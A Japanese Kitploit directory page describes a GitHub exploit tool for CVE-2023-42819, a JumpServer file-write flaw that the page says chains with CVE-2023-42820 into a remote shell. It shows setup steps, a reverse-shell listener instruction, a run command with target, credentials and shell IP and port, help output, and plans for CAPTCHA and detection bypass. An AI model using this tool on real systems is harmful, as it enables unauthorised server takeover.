Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/c1ph3rx13/cve-2023-42819
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテスト
GitHubc1ph3rx13/cve-2023-42819

CVE-2023-42819

CVE-2023-42819

リポジトリを見る
6312年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-42819

CVE-2023-42819

脆弱性説明

JumpServer 任意ファイル書き込み脆弱性

CVE-2023-42819 + CVE-2023-42820 = GetShell

USAGE

  1. スクリプトと必要なファイルを同じディレクトリに配置します

  2. Google Chrome がインストールされていることを確認し、Google Chrome のバージョン番号を取得します

root@kitploit:~
reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
  1. Google Chrome のバージョン番号とシステムに対応した chromedriver をダウンロードした後、webdriver 内に配置します

    最新バージョン:https://googlechromelabs.github.io/chrome-for-testing/

    過去バージョン:https://chromedriver.chromium.org/downloads/version-selection

    要求が多くて : (

  2. 対応する IP と Port をリッスンし、リバースシェルを待ちます

Python バージョン

root@kitploit:~
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: コードは学習目的のみに使用し、他の目的には使用しないでください

usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]

CVE-2023-42819 by C1ph3rX13.

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        ターゲットURL
  -u USERNAME, --username USERNAME
                        アカウントユーザー名
  -p PASSWORD, --password PASSWORD
                        アカウントパスワード
  --ip IP               シェルIP
  --port PORT           シェルポート
  --proxy PROXY         プロキシ(http://ip:port)

image-1

image-1

Go バージョン

Build

root@kitploit:~
go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath

Run

root@kitploit:~
.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
             

        ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██╗  ██╗██████╗  █████╗  ██╗ █████╗  
        ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ██║  ██║╚════██╗██╔══██╗███║██╔══██╗
        ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
        ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
        ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝           ██║███████╗╚█████╔╝ ██║ █████╔╝
        ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝            ╚═╝╚══════╝ ╚════╝  ╚═╝ ╚════╝  
                                                                                                                
    @Auth: C1ph3rX13                                                                                            
    @Blog: https://c1ph3rx13.github.io                                                                          
    @Note: コードは学習目的のみに使用し、他の目的には使用しないでください                                                                   

Usage of CVE-2023-42819.exe:
  -ip string                                                                  
        シェルIP
  -p string
        アカウントパスワード
  -port string
        シェルポート
  -proxy string
        プロキシURL
  -t string
        ターゲットURL
  -u string
        アカウントユーザー名

image-1

TODO

  • クロスオリジン対応が不十分
  • httpx を使用して書き直し
  • EXP 関数の追加
  • go-resty を使用して書き直し
  • ログイン時のパスワード誤入力によるCAPTCHA回避
  • リバースシェルの種類を追加
  • headless モードを使用して Linux 対応
  • http, https, socks プロキシの追加
  • CVE-2023-42819 + CVE-2023-42820 ワンクリック GetShell
  • これだけフラグを立てても、達成できないかもしれない : (

メンテナンス

  • 2023-10-18 Webサイト自動化検出回避機能の追加 - Python バージョン
  • 2023-10-18 クライアント関数のリファクタリング
  • 2023-10-18 実行ロジックの簡略化
  • 2023-10-18 Linux テスト OK - Go バージョン

免責事項

  1. 本ツールは、適法な権限を持つペネトレーションテストのセキュリティ担当者および通常のネットワーク運用担当者のみを対象としており、ユーザーは十分な法的権限を取得し、非営利目的である場合に限り、ダウンロード、複製、配布、または使用することができます。
  2. 本ツールを使用する過程では、すべての行動が現地の法令に準拠していることを確認し、本ソフトウェアを中華人民共和国の関連法律に違反する活動に使用しないでください。本ツールのすべての作成者および貢献者は、ユーザーが無断で本ツールを使用して違法行為を行った場合の責任を負いません。
ツールをダウンロード